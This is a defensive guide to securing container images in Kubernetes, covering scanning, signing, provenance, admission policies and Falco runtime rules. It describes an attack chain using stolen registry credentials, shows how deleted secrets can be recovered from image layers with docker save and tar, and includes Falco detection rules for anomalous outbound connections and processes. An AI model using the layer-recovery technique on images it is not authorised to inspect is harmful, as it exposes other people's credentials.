Image Threat Model

Container images are a primary attack vector in Kubernetes. Compromised images bypass most runtime controls because the attack is baked in before the container ever starts.

Vulnerable Dependencies

OS packages and language libraries with known CVEs. Many real-world compromises exploit publicly disclosed vulnerabilities for which a patch was already available.

Malicious Base Images

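Typosquatted or compromised public images on Docker Hub. Examples: a misspelled tag such as mysql:lastest that resolves to an attacker-controlled image, or a backdoored build published under a familiar name such as node:slim.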

Secrets Baked In

API keys, TLS certs, SSH keys, or database passwords embedded in image layers via COPY, RUN, or ENV.

Unverified Provenance

No proof that an image was built from source you control. A compromised CI pipeline could inject malicious code and still publish the result under the expected tag.

Tag Mutability

Image tags are mutable. :latest or even :1.2.3 can be overwritten. Re-deploying the "same" tag may run different code.

Attack Chain

Compromised registry credentials → push malicious image with legitimate tag → Kubernetes pulls on next rollout → attacker code runs with pod's RBAC permissions and network access.

Image Anatomy & Attack Surface

Understanding the OCI image specification reveals exactly where each attack type enters.

Image Manifest ──────────────────────────────────────────────
├── Config (image config JSON)          ← ENV vars, CMD, ENTRYPOINT, USER
│   └── Attack: secrets in ENV, root as the default USER
└── Layers (ordered)
    ├── Layer 0: FROM ubuntu:22.04      ← base image CVEs
    ├── Layer 1: RUN apt-get install    ← package CVEs added here
    ├── Layer 2: COPY . /app            ← source code + possibly secrets
    └── Layer N: RUN pip install        ← library CVEs

# Secrets in deleted layers are still accessible
# Layer 3: secret present
COPY secret.key /tmp/secret.key
# Layer 4: file deleted, but Layer 3 is still part of the image
RUN rm /tmp/secret.key

Deleted Files Are Not Gone

OCI layers are additive. A file deleted in a later layer is still present in the earlier layer and can be recovered with docker save <image> -o image.tar && tar xf image.tar, then unpacking the individual layer archives. Never add secrets to any layer, even temporarily.
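The additive behavior can be illustrated without Docker. The sketch below is a simplified model, not a real image: it builds two in-memory tar archives standing in for layers, where the second "deletes" the secret using an OCI-style whiteout entry (`.wh.<name>`). The helper names `make_layer` and `find_in_layers` are hypothetical.

```python
import io
import tarfile


def make_layer(files: dict[str, bytes]) -> bytes:
    """Build an uncompressed tar archive in memory, one entry per file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def find_in_layers(layers: list[bytes], name: str) -> list[int]:
    """Return the index of every layer archive that contains `name`."""
    hits = []
    for index, blob in enumerate(layers):
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r") as tar:
            if name in tar.getnames():
                hits.append(index)
    return hits


# Layer 0 adds the secret; layer 1 only records a whiteout marker for it.
layers = [
    make_layer({"tmp/secret.key": b"-----BEGIN PRIVATE KEY-----"}),
    make_layer({"tmp/.wh.secret.key": b""}),
]

# The secret is hidden in the merged filesystem but still sits in layer 0.
print(find_in_layers(layers, "tmp/secret.key"))
```

Anyone who can pull the image can read layer 0 directly, which is why the only safe fix is to rebuild without the secret and rotate it.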

Image Identity: Tag vs Digest

| Reference Type | Example | Mutable? | Security Implication |
|---|---|---|---|
| Tag | nginx:1.25.3 | Yes | Anyone with push access can overwrite it; no guarantee of content |
| Digest | nginx@sha256:abc123... | No | Cryptographically immutable; content cannot change |
| Tag + Digest | nginx:1.25.3@sha256:abc... | No | Best of both: human-readable + immutable reference |

Always Pin to Digest in Production

Tags are human convenience. Pin production workloads to digest references. Admission controllers can enforce this. Update digests as part of your dependency update process.
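A digest is immutable because it is derived from the content itself. The following sketch shows the two ideas side by side: a content digest computed with SHA-256, and a simple check that a reference is digest-pinned. The function names and the regular expression are illustrative assumptions, not part of any registry client.

```python
import hashlib
import re

# A pinned reference ends with @sha256: followed by 64 lowercase hex characters.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")


def content_digest(blob: bytes) -> str:
    """Return the sha256 digest string for a blob, in registry notation."""
    return "sha256:" + hashlib.sha256(blob).hexdigest()


def is_digest_pinned(image_ref: str) -> bool:
    """True when the reference carries a full sha256 digest."""
    return DIGEST_RE.search(image_ref) is not None


manifest_v1 = b'{"layers": ["base", "app-1.0"]}'
manifest_v2 = b'{"layers": ["base", "app-1.0-backdoored"]}'

# Different content always yields a different digest, so a pinned
# reference cannot silently start pointing at other content.
pinned = "registry.example.com/myapp@" + content_digest(manifest_v1)
print(is_digest_pinned(pinned))
print(is_digest_pinned("registry.example.com/myapp:1.2.3"))
print(content_digest(manifest_v1) == content_digest(manifest_v2))
```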

Base Image Strategy

The base image determines your initial attack surface. Smaller base images have fewer packages to patch and a smaller CVE surface.

| Base Image | Size | Shell | Package Mgr | Use Case | Relative Security |
|---|---|---|---|---|---|
| ubuntu:22.04 | ~77MB | Yes | apt | Development, debugging | Low |
| debian:bookworm-slim | ~75MB | Yes | apt | General purpose | Medium |
| alpine:3.19 | ~7MB | ash | apk | Small footprint | Medium |
| gcr.io/distroless/base | ~20MB | No | None | Compiled binaries | High |
| gcr.io/distroless/java17 | ~200MB | No | None | JVM applications | High |
| gcr.io/distroless/python3 | ~100MB | No | None | Python apps | High |
| scratch | 0MB | No | None | Static Go binaries | Highest |

Distroless Benefits

Distroless images contain only your application and its runtime dependencies: no shell, no package manager, no coreutils. This eliminates entire classes of post-exploitation techniques (reverse shells, package installation, script execution). Without a shell, an interactive kubectl exec session is no longer possible, but debugging still is: attach an ephemeral debug container with kubectl debug -it <pod> --image=busybox --target=<container>.

Multi-Stage Build Pattern

Multi-stage builds are the primary mechanism for separating build-time tools from the final image, preventing the leakage of build secrets and tools into production images.

# Stage 1: Build (all build deps, secrets, tools)
FROM golang:1.22 AS builder

WORKDIR /app

# Dependency layer (cached unless go.mod/sum changes)
COPY go.mod go.sum ./
RUN go mod download

# Source code
COPY . .

# Build static binary — no CGO means no glibc dependency
RUN CGO_ENABLED=0 GOOS=linux go build -ldflags="-w -s" -o /server ./cmd/server

# Stage 2: Final image — only the binary
FROM gcr.io/distroless/static-debian12:nonroot

# nonroot tag: runs as UID 65532 by default
COPY --from=builder /server /server

# Document the port (does not publish it)
EXPOSE 8080

# Use a numeric UID so the kubelet can verify runAsNonRoot
USER 65532:65532

ENTRYPOINT ["/server"]

Build Secrets with --mount=type=secret

For private package registries during build, use BuildKit's secret mount — the secret is never written to any layer:

# BuildKit secret mount — never appears in any layer
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc \
    npm install --production

# Build with:
# docker buildx build --secret id=npmrc,src=.npmrc .

Vulnerability Scanning

Vulnerability scanners match image packages and libraries against CVE databases (NVD, OSV, GHSA). They are a necessary but not sufficient security control — zero-day vulnerabilities have no CVE.

Scanning Tools Comparison

| Tool | Type | Databases | Formats | Kubernetes Integration |
|---|---|---|---|---|
| Trivy | Open source | NVD, GHSA, OSV, language-specific | JSON, SARIF, CycloneDX, SPDX | Operator, CLI, CI/CD |
| Grype (Anchore) | Open source | NVD, GHSA, OSV | JSON, SARIF, CycloneDX | CLI, CI/CD |
| Snyk | Commercial | Snyk DB (proprietary) | JSON, SARIF | Operator, admission webhook |
| Prisma Cloud (Twistlock) | Commercial | Multiple + runtime | Multiple | Deep K8s integration |
| Clair | Open source | NVD, RHEL, Ubuntu | JSON | Registry-integrated |

Trivy Usage

# Scan image — includes OS packages and language libs
trivy image nginx:1.25.3

# Scan with severity filter (fail CI on CRITICAL/HIGH)
trivy image --exit-code 1 --severity CRITICAL,HIGH nginx:1.25.3

# SBOM-first scan: generate CycloneDX SBOM then scan it
trivy image --format cyclonedx --output sbom.json nginx:1.25.3
trivy sbom sbom.json

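# Scan in-cluster images (requires kubeconfig)
# Note: trivy k8s syntax has changed across releases. Newer versions drop the
# "cluster" argument and replace --namespace with --include-namespaces;
# check trivy k8s --help for the installed version.
trivy k8s --report summary cluster

# Scan a specific namespace
trivy k8s --namespace production --report all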

# Ignore unfixed vulnerabilities (useful for reducing noise)
trivy image --ignore-unfixed nginx:1.25.3

# Scan with .trivyignore for known-acceptable CVEs
trivy image --ignorefile .trivyignore nginx:1.25.3
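When the built-in `--exit-code` gate is not flexible enough, a pipeline can parse the JSON report itself. The sketch below assumes the report layout produced by `trivy image --format json` (a top-level `Results` list whose entries may carry a `Vulnerabilities` list with a `Severity` field); confirm the field names against the Trivy version in use. The sample report is illustrative data, not real scanner output.

```python
from collections import Counter


def count_by_severity(report: dict) -> Counter:
    """Tally vulnerabilities per severity across all scan targets."""
    counts: Counter = Counter()
    for result in report.get("Results") or []:
        # Targets without findings may omit the key or set it to null.
        for vuln in result.get("Vulnerabilities") or []:
            counts[vuln.get("Severity", "UNKNOWN")] += 1
    return counts


def should_block(report: dict, blocking=("CRITICAL", "HIGH")) -> bool:
    """True when any finding has a severity listed in `blocking`."""
    counts = count_by_severity(report)
    return any(counts[severity] > 0 for severity in blocking)


sample_report = {
    "Results": [
        {"Target": "nginx:1.25.3 (debian 12)", "Vulnerabilities": [
            {"VulnerabilityID": "CVE-2023-44487", "Severity": "HIGH"},
            {"VulnerabilityID": "CVE-0000-0001", "Severity": "MEDIUM"},
        ]},
        {"Target": "app/package-lock.json", "Vulnerabilities": None},
    ]
}

print(dict(count_by_severity(sample_report)))
print(should_block(sample_report))
```

In a real pipeline the dictionary would come from `json.load` on the report file, and a true result would translate into a non-zero exit status.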

CVSS Scoring and Triage

| Severity | CVSS Score | Action | SLA |
|---|---|---|---|
| Critical | 9.0–10.0 | Block deployment, immediate patch | 24–48 hours |
| High | 7.0–8.9 | Block deployment, patch in sprint | 7 days |
| Medium | 4.0–6.9 | Track, patch in next release | 30 days |
| Low | 0.1–3.9 | Track, patch opportunistically | 90 days |
| None | 0.0 | Informational | Best effort |

CVSS Score Is Not Everything

CVSS score measures theoretical severity, not actual exploitability in your environment. A Critical CVE in a library that has no network path to an attacker is less urgent than a Medium CVE in your public API handler. Use CVSS as a starting point, not a final decision. VEX (Vulnerability Exploitability eXchange) documents add exploitability context by stating whether a product is actually affected by a given CVE.
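The triage table can be encoded directly so that tooling applies the same thresholds everywhere. This is a minimal sketch of that mapping; the function name `triage` is hypothetical and the SLA strings simply mirror the table.

```python
def triage(score: float) -> tuple[str, str]:
    """Map a CVSS base score to (severity, remediation SLA) per the table."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS score out of range: {score}")
    if score >= 9.0:
        return ("Critical", "24-48 hours")
    if score >= 7.0:
        return ("High", "7 days")
    if score >= 4.0:
        return ("Medium", "30 days")
    if score > 0.0:
        return ("Low", "90 days")
    return ("None", "Best effort")


for example in (9.8, 7.5, 5.3, 2.1, 0.0):
    print(example, triage(example))
```

The result is only the default priority; exploitability context such as a VEX statement can justify moving a finding up or down from it.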

Trivy Operator — In-Cluster Continuous Scanning

# Install Trivy Operator via Helm
helm repo add aqua https://aquasecurity.github.io/helm-charts/
helm install trivy-operator aqua/trivy-operator \
  --namespace trivy-system \
  --create-namespace \
  --set="trivy.ignoreUnfixed=true"

# Operator creates VulnerabilityReport resources per workload container
kubectl get vulnerabilityreports -A
kubectl describe vulnerabilityreport replicaset-nginx-abc123-nginx -n production

# VulnerabilityReport resource (auto-created by Trivy Operator)
apiVersion: aquasecurity.github.io/v1alpha1
kind: VulnerabilityReport
metadata:
  name: replicaset-nginx-abc123-nginx
  namespace: production
report:
  summary:
    criticalCount: 0
    highCount: 2
    mediumCount: 5
  vulnerabilities:
  - vulnerabilityID: CVE-2023-44487
    title: HTTP/2 Rapid Reset Attack
    severity: HIGH
    fixedVersion: 1.25.3
    resource: nginx

Registry Security

Registry Authentication

# Create imagePullSecret for private registry
kubectl create secret docker-registry regcred \
  --docker-server=registry.example.com \
  --docker-username=myuser \
  --docker-password=mypassword \
  --docker-email=ops@example.com \
  --namespace production

# Reference in pod spec
spec:
  imagePullSecrets:
  - name: regcred
  containers:
  - name: myapp
    image: registry.example.com/myapp:1.2.3

# Attach imagePullSecret to the ServiceAccount so every pod
# that runs under it picks up the secret automatically
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: production
imagePullSecrets:
- name: regcred

imagePullSecrets Are Namespace-Scoped

Attaching an imagePullSecret to the default ServiceAccount makes it available to all pods that use that SA in that namespace. A Secret cannot be referenced across namespaces, so each namespace needs its own copy. Tools such as Reflector, or a Kyverno generate policy, can keep those copies in sync. (Reloader does not copy secrets; it restarts workloads when a Secret or ConfigMap changes.)
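Replicating the secret means recreating the same `.dockerconfigjson` payload in every namespace. The sketch below builds that payload and wraps it in a Secret manifest per namespace. It reflects the commonly documented structure of `kubernetes.io/dockerconfigjson` secrets; the helper names and the credentials are placeholders.

```python
import base64
import json


def docker_config_json(server: str, username: str, password: str) -> str:
    """Build the JSON document stored under the .dockerconfigjson key."""
    auth = base64.b64encode(f"{username}:{password}".encode()).decode()
    return json.dumps(
        {"auths": {server: {"username": username, "password": password, "auth": auth}}}
    )


def pull_secret_manifest(name: str, namespace: str, config_json: str) -> dict:
    """Wrap the config in a Secret manifest for one namespace."""
    return {
        "apiVersion": "v1",
        "kind": "Secret",
        "metadata": {"name": name, "namespace": namespace},
        "type": "kubernetes.io/dockerconfigjson",
        # Secret data values are base64-encoded.
        "data": {".dockerconfigjson": base64.b64encode(config_json.encode()).decode()},
    }


config = docker_config_json("registry.example.com", "myuser", "mypassword")
manifests = [
    pull_secret_manifest("regcred", namespace, config)
    for namespace in ("production", "staging")
]
print([m["metadata"]["namespace"] for m in manifests])
```

Generated manifests contain the credentials in recoverable form, so they should be applied directly to the cluster and never committed to version control.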

imagePullPolicy

| Policy | Behavior | Security Risk | When to Use |
|---|---|---|---|
| Always | Pull on every pod start | Lowest: the tag is re-resolved against the registry each time | Production with mutable tags |
| IfNotPresent | Pull only if not on node | Medium: cached image may be stale | Pinned digests |
| Never | Never pull, fail if absent | High: relies on pre-loaded images | Air-gapped environments |

AlwaysPullImages Admission Plugin

Enabling the AlwaysPullImages admission plugin forces imagePullPolicy: Always on every pod, regardless of what the pod spec says. Every pod start then goes through registry authentication, which prevents a workload from running an image that a different tenant pulled previously. Without it, tenant A could run tenant B's private image without holding credentials for it, as long as the image is already cached on the same node.

Registry Security Controls

| Control | Description | Implementation |
|---|---|---|
| Private registry | No anonymous pulls | Harbor, ECR, GCR, ACR with auth required |
| Image scanning gate | Block push if vulnerabilities exceed threshold | Harbor built-in, ECR Enhanced Scanning |
| Content trust | Only signed images allowed | Notary v2, Cosign, registry policy |
| Repository RBAC | Teams can only push to their repos | Harbor projects, ECR resource policies |
| Immutable tags | Tags cannot be overwritten | ECR immutable tags, Harbor tag immutability rules |
| Geo-replication | Images closer to clusters | Harbor replication, ECR replication |
| Audit logging | Who pushed/pulled when | Registry audit logs → SIEM |

Image Signing with Cosign

Cosign (part of the Sigstore project) enables cryptographic signing of container images, creating a verifiable link between an image digest and an identity that signed it.

── Key-based signing workflow ────────────────────────────────────────

CI/CD Pipeline
│
├─ Build image → push to registry
│   └── Image Digest: sha256:abc123...
│
├─ Sign with private key:
│   cosign sign --key cosign.key registry/image@sha256:abc123
│   └── Signature stored in registry as: registry/image:sha256-abc123.sig
│
└─ Push SBOM attestation:
    cosign attest --key cosign.key --predicate sbom.json registry/image@sha256:abc123

── Verification at admission time ────────────────────────────────────

Admission Webhook (Kyverno / Policy Controller)
│
├─ Pod CREATE request arrives
├─ Extract image reference
├─ Fetch signature from registry
├─ Verify: cosign verify --key cosign.pub registry/image@sha256:abc123
└─ Allow (signature valid) or Deny (no valid signature)
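The signature location shown in the workflow follows a naming convention: the digest's colon is replaced with a hyphen and `.sig` is appended, giving a tag in the same repository. A small sketch of that mapping follows; `signature_tag` is a hypothetical helper, and newer Cosign releases may also store signatures through other mechanisms, so treat this as a description of the tag scheme only.

```python
def signature_tag(repository: str, digest: str) -> str:
    """Derive the tag-based signature reference for an image digest."""
    algorithm, separator, hex_value = digest.partition(":")
    if not (algorithm and separator and hex_value):
        raise ValueError(f"not a digest: {digest!r}")
    return f"{repository}:{algorithm}-{hex_value}.sig"


print(signature_tag("registry/image", "sha256:abc123"))
```

Because the signature lives next to the image, a verifier needs only pull access to the same repository to fetch it.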

Key-Based Signing

# Generate key pair (store private key in Vault/KMS, not CI env var)
cosign generate-key-pair

# Sign image (after push to registry)
cosign sign --key cosign.key \
  registry.example.com/myapp@sha256:abc123...

# Sign with KMS key (Google Cloud KMS example)
cosign sign --key gcpkms://projects/my-project/locations/global/keyRings/my-ring/cryptoKeys/cosign \
  registry.example.com/myapp@sha256:abc123...

# Verify image signature
cosign verify --key cosign.pub \
  registry.example.com/myapp@sha256:abc123...

# Verify outputs JSON with signer identity and timestamp

Keyless Signing (Sigstore)

Keyless signing uses ephemeral keys tied to OIDC identity (GitHub Actions, Google SA, etc.) and records signatures in the public Rekor transparency log. No long-lived private keys to manage or protect.

GitHub Actions
│
├─ OIDC token issued by GitHub (id-token: write permission)
│     iss: https://token.actions.githubusercontent.com
│     sub: repo:myorg/myrepo:ref:refs/heads/main
│
├─ cosign sign (transparency log upload enabled, the default)
│   ├── Request ephemeral cert from Fulcio CA
│   │   └── Cert binds: OIDC identity ↔ ephemeral public key
│   ├── Sign image digest with ephemeral private key
│   └── Upload signature + cert to Rekor transparency log
│
└─ Ephemeral private key discarded

Verifier
├─ Fetch signature from registry
├─ Verify cert chain (Fulcio root CA)
├─ Verify signature with cert public key
├─ Check Rekor inclusion proof
└─ Verify cert subject matches expected OIDC identity

# Keyless sign in GitHub Actions (OIDC token available automatically)
- name: Sign image
  run: |
    cosign sign \
      --yes \
      registry.example.com/myapp@${{ steps.build.outputs.digest }}
  env:
    COSIGN_EXPERIMENTAL: "1"  # Not needed from cosign v2.0+

# Keyless verify — check identity matches expected GitHub workflow
cosign verify \
  --certificate-identity-regexp "https://github.com/myorg/myrepo/.github/workflows/.*" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  registry.example.com/myapp@sha256:abc123...

Attestations

# Attach SBOM as attestation (CycloneDX format)
cosign attest \
  --key cosign.key \
  --type cyclonedx \
  --predicate sbom.cyclonedx.json \
  registry.example.com/myapp@sha256:abc123...

# Attach SLSA provenance as attestation
cosign attest \
  --key cosign.key \
  --type slsaprovenance \
  --predicate provenance.json \
  registry.example.com/myapp@sha256:abc123...

# Verify attestation
cosign verify-attestation \
  --key cosign.pub \
  --type cyclonedx \
  registry.example.com/myapp@sha256:abc123... | \
  jq -r .payload | base64 -d | jq .
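The shell pipeline above unwraps an envelope whose `payload` field is a base64-encoded in-toto statement. The same decoding step can be sketched in a few lines; the envelope below is constructed by hand for illustration (empty `signatures`, made-up subject and component), and the exact predicate layout may differ between Cosign versions.

```python
import base64
import json


def decode_attestation(envelope_json: str) -> dict:
    """Decode the base64 payload of an attestation envelope into a statement."""
    envelope = json.loads(envelope_json)
    return json.loads(base64.b64decode(envelope["payload"]))


# Hand-built example envelope; real ones come from cosign verify-attestation.
statement = {
    "_type": "https://in-toto.io/Statement/v0.1",
    "predicateType": "https://cyclonedx.org/bom",
    "subject": [{"name": "registry.example.com/myapp", "digest": {"sha256": "abc123"}}],
    "predicate": {"components": [{"name": "openssl", "version": "3.0.13"}]},
}
envelope_json = json.dumps({
    "payloadType": "application/vnd.in-toto+json",
    "payload": base64.b64encode(json.dumps(statement).encode()).decode(),
    "signatures": [],
})

decoded = decode_attestation(envelope_json)
print(decoded["predicateType"], len(decoded["predicate"]["components"]))
```

Decoding is not verification: the payload should be trusted only after `cosign verify-attestation` has checked the signature.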

SLSA Provenance

SLSA (Supply-chain Levels for Software Artifacts, pronounced "salsa") is a framework of incrementally adoptable security levels for software supply chains, originally proposed by Google and now maintained under the OpenSSF. The levels below follow the original SLSA v0.1 numbering; SLSA v1.0 restructured them into a Build track with levels L0 to L3 and no longer defines level 4.

| Level | Requirements | What It Prevents |
|---|---|---|
| SLSA 0 | No guarantees | Nothing |
| SLSA 1 | Provenance generated (not authenticated) | Accidental mistakes; provides artifact lineage |
| SLSA 2 | Signed provenance from hosted build service | Tampering after the build; identifies build service |
| SLSA 3 | Hardened build platform; non-forgeable provenance | Compromised build service modifying artifacts |
| SLSA 4 | Two-person review; hermetic builds | Insider threats; reproducible builds verification |

SLSA Level 3 Is the Practical Target

SLSA 3 requires a hosted, hardened build platform (GitHub Actions, Google Cloud Build, etc.) that generates non-forgeable provenance. This is achievable with existing CI/CD tooling. SLSA 4 requires hermetic and, ideally, reproducible builds, which many projects cannot achieve today.

SLSA Provenance with GitHub Actions

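# .github/workflows/release.yaml
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      id-token: write     # For OIDC / Sigstore
      contents: read
      packages: write     # For pushing to GHCR
    outputs:
      digest: ${{ steps.build.outputs.digest }}   # Consumed by the provenance job
    steps:
    - uses: actions/checkout@v4
    - name: Log in to GHCR
      uses: docker/login-action@v3
      with:
        registry: ghcr.io
        username: ${{ github.actor }}
        password: ${{ secrets.GITHUB_TOKEN }}
    - name: Build and push
      id: build
      uses: docker/build-push-action@v5
      with:
        push: true
        tags: ghcr.io/myorg/myapp:${{ github.sha }}

  provenance:
    needs: [build]
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_container_slsa3.yml@v1.10.0
    with:
      image: ghcr.io/myorg/myapp
      digest: ${{ needs.build.outputs.digest }}
      registry-username: ${{ github.actor }}
    secrets:
      registry-password: ${{ secrets.GITHUB_TOKEN }}
    permissions:
      id-token: write
      contents: read
      packages: write
      actions: read

# Verify SLSA provenance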
slsa-verifier verify-image \
  --source-uri github.com/myorg/myapp \
  --source-tag v1.2.3 \
  ghcr.io/myorg/myapp@sha256:abc123...

Policy Enforcement in Kubernetes

Kyverno verifyImages

Kyverno's verifyImages rule validates image signatures and attestations at admission time. It supports Cosign key-based, keyless, and attestation verification.

# Kyverno ClusterPolicy: require signed images from trusted registry
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  background: false   # Don't check existing pods
  rules:
  - name: verify-signature
    match:
      any:
      - resources:
          kinds: [Pod]
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - entries:
        - keys:
            publicKeys: |-
              -----BEGIN PUBLIC KEY-----
              MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE...
              -----END PUBLIC KEY-----
      mutateDigest: true   # Replace tag with verified digest
      verifyDigest: true   # Ensure image ref uses digest
      required: true

# Kyverno verifyImages: keyless (Sigstore) verification
    verifyImages:
    - imageReferences:
      - "ghcr.io/myorg/*"
      attestors:
      - entries:
        - keyless:
            subject: "https://github.com/myorg/myrepo/.github/workflows/release.yaml@refs/heads/main"
            issuer: "https://token.actions.githubusercontent.com"
            rekor:
              url: https://rekor.sigstore.dev

# Kyverno verifyImages: verify SBOM attestation exists
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestations:
      - type: https://cyclonedx.org/bom
        attestors:
        - entries:
          - keys:
              publicKeys: "..."
        conditions:
        - all:
          - key: "{{ components | length(@) }}"
            operator: GreaterThan
            value: "0"

Registry Allow-List with Kyverno

# Block images from untrusted registries
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  rules:
  - name: validate-registries
    match:
      any:
      - resources:
          kinds: [Pod]
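    validate:
      message: "Images must come from registry.example.com or gcr.io/distroless"
      pattern:
        spec:
          # =(...) anchors: validated only when the field is present
          =(ephemeralContainers):
          - image: "registry.example.com/* | gcr.io/distroless/*"
          =(initContainers):
          - image: "registry.example.com/* | gcr.io/distroless/*"
          containers:
          - image: "registry.example.com/* | gcr.io/distroless/*"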

OPA Gatekeeper: Digest Pinning Policy

# ConstraintTemplate: require digest-pinned images
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8srequiredimagedigest
spec:
  crd:
    spec:
      names:
        kind: K8sRequiredImageDigest
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8srequiredimagedigest

      violation[{"msg": msg}] {
        container := input.review.object.spec.containers[_]
        not contains(container.image, "@sha256:")
        msg := sprintf("Container '%v' image '%v' must use digest pinning (@sha256:...)", [container.name, container.image])
      }

      violation[{"msg": msg}] {
        container := input.review.object.spec.initContainers[_]
        not contains(container.image, "@sha256:")
        msg := sprintf("InitContainer '%v' image '%v' must use digest pinning", [container.name, container.image])
      }

ValidatingAdmissionPolicy (CEL): Registry Check

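# Takes effect only once a ValidatingAdmissionPolicyBinding references it.
# The expressions cover spec.containers only; initContainers and
# ephemeralContainers need equivalent validations.
apiVersion: admissionregistration.k8s.io/v1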
kind: ValidatingAdmissionPolicy
metadata:
  name: check-image-registry
spec:
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: [v1]
      operations: [CREATE, UPDATE]
      resources: [pods]
  validations:
  - expression: >
      object.spec.containers.all(c,
        c.image.startsWith("registry.example.com/") ||
        c.image.startsWith("gcr.io/distroless/")
      )
    message: "Images must come from approved registries"
  - expression: >
      object.spec.containers.all(c,
        c.image.contains("@sha256:")
      )
    message: "Images must be pinned to a digest"

Runtime Image Security

Falco Rules for Image Anomalies

Falco detects runtime behavior that indicates a compromised or malicious image. Crucially, Falco detects but does not prevent — pair it with admission controls for prevention.

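# The lists referenced below (trusted_root_images, allowed_outbound_ports,
# allowed_outbound_ips, allowed_processes, allowed_parent_processes) are
# placeholders and must be defined as Falco lists in the same rules file.

# Falco rule: detect container running as root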
- rule: Container Running as Root
  desc: Detect containers running as root user
  condition: >
    container and
    proc.vpid=1 and
    user.uid=0 and
    not container.image.repository in (trusted_root_images)
  output: >
    Container running as root (user=%user.name image=%container.image.repository
    container=%container.name pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: WARNING

# Falco rule: detect unexpected network connection from container
- rule: Unexpected Outbound Connection
  desc: Detect outbound network connections to unusual destinations
  condition: >
    outbound and
    container and
    not fd.sport in (allowed_outbound_ports) and
    not fd.sip in (allowed_outbound_ips)
  output: >
    Unexpected outbound connection (image=%container.image.repository
    connection=%fd.name pod=%k8s.pod.name)
  priority: CRITICAL

# Falco rule: detect binary execution in container
- rule: Unexpected Process in Container
  desc: Detect execution of binaries not expected in container
  condition: >
    spawned_process and
    container and
    not proc.name in (allowed_processes) and
    not proc.pname in (allowed_parent_processes)
  output: >
    Unexpected process (proc=%proc.name pproc=%proc.pname
    image=%container.image.repository pod=%k8s.pod.name)
  priority: ERROR

Image Pull Verification Workflow

1. Pod CREATE Request

Admission webhook intercepts the pod creation request before it reaches etcd.

2. Registry Allow-List Check

Validate image references start with approved registry prefixes. Reject images from Docker Hub or unrecognized registries.

3. Digest Pinning Check

Validate image references contain @sha256: digest. Reject mutable tag-only references.

4. Signature Verification

Fetch and verify Cosign signature from registry. Validate against trusted public keys or OIDC identity constraints.

5. Admission Allowed

Image reference mutated to verified digest (if tag was supplied). Pod created with immutable image reference.
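The ordering of these checks matters: cheap string checks run first and signature verification, which needs a registry round trip, runs last. The sketch below models steps 2 to 4 as plain functions. It is not an admission webhook; `is_signed` is a caller-supplied stand-in for real Cosign verification, and the approved prefixes are the example values used earlier.

```python
from dataclasses import dataclass
from typing import Callable

APPROVED_PREFIXES = ("registry.example.com/", "gcr.io/distroless/")


@dataclass
class Decision:
    allowed: bool
    reason: str


def check_image(image: str, is_signed: Callable[[str], bool]) -> Decision:
    """Apply the allow-list, digest, and signature checks in order."""
    if not image.startswith(APPROVED_PREFIXES):
        return Decision(False, "registry not approved")
    if "@sha256:" not in image:
        return Decision(False, "image not pinned to a digest")
    if not is_signed(image):
        return Decision(False, "no valid signature")
    return Decision(True, "ok")


def admit_pod(pod: dict, is_signed: Callable[[str], bool]) -> Decision:
    """Check every container type; the first failure denies the pod."""
    spec = pod.get("spec", {})
    containers = (
        (spec.get("containers") or [])
        + (spec.get("initContainers") or [])
        + (spec.get("ephemeralContainers") or [])
    )
    for container in containers:
        decision = check_image(container["image"], is_signed)
        if not decision.allowed:
            return Decision(False, f"{container['name']}: {decision.reason}")
    return Decision(True, "all images passed")


pod = {"spec": {
    "containers": [{"name": "app", "image": "registry.example.com/myapp@sha256:abc123"}],
    "initContainers": [{"name": "init", "image": "busybox:1.36"}],
}}
print(admit_pod(pod, is_signed=lambda image: True))
```

Including init and ephemeral containers in the loop closes a common gap: a policy that inspects only `spec.containers` can be bypassed through the other container lists.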

Dockerfile Hardening

Complete Hardened Dockerfile

###############################################################
# Stage 1: Dependency download (separate for better caching)
###############################################################
FROM node:20-alpine3.19 AS deps

WORKDIR /app

# Copy only manifests first — layer cache: only invalidated when deps change
COPY package.json package-lock.json ./
RUN npm ci --omit=dev --ignore-scripts

###############################################################
# Stage 2: Application build
###############################################################
FROM node:20-alpine3.19 AS build

WORKDIR /app
COPY package.json package-lock.json ./
RUN npm ci                          # include devDeps for build
COPY . .
RUN npm run build

###############################################################
# Stage 3: Production image
###############################################################
FROM node:20-alpine3.19

# Upgrade OS packages to get latest CVE fixes
RUN apk update && apk upgrade --no-cache && rm -rf /var/cache/apk/*

# Create non-root user with fixed UID (important for runAsNonRoot + runAsUser)
RUN addgroup -g 10001 -S appgroup && \
    adduser  -u 10001 -S appuser -G appgroup

WORKDIR /app

# Copy artifacts from build stages (not source code or devDeps)
COPY --from=deps   --chown=appuser:appgroup /app/node_modules ./node_modules
COPY --from=build  --chown=appuser:appgroup /app/dist         ./dist
COPY               --chown=appuser:appgroup package.json      .

# Drop to non-root user
USER 10001:10001

# Document (do not publish) the application port
EXPOSE 3000

# Use exec form (not shell form) to ensure signals propagate correctly
ENTRYPOINT ["node", "dist/server.js"]

Dockerfile Anti-Patterns

| Anti-Pattern | Risk | Fix |
|---|---|---|
| FROM ubuntu:latest | Non-reproducible, mutable | Pin to specific digest: FROM ubuntu:22.04@sha256:... |
| USER root (final image) | Container runs as root | Add non-root user, use USER 10001 |
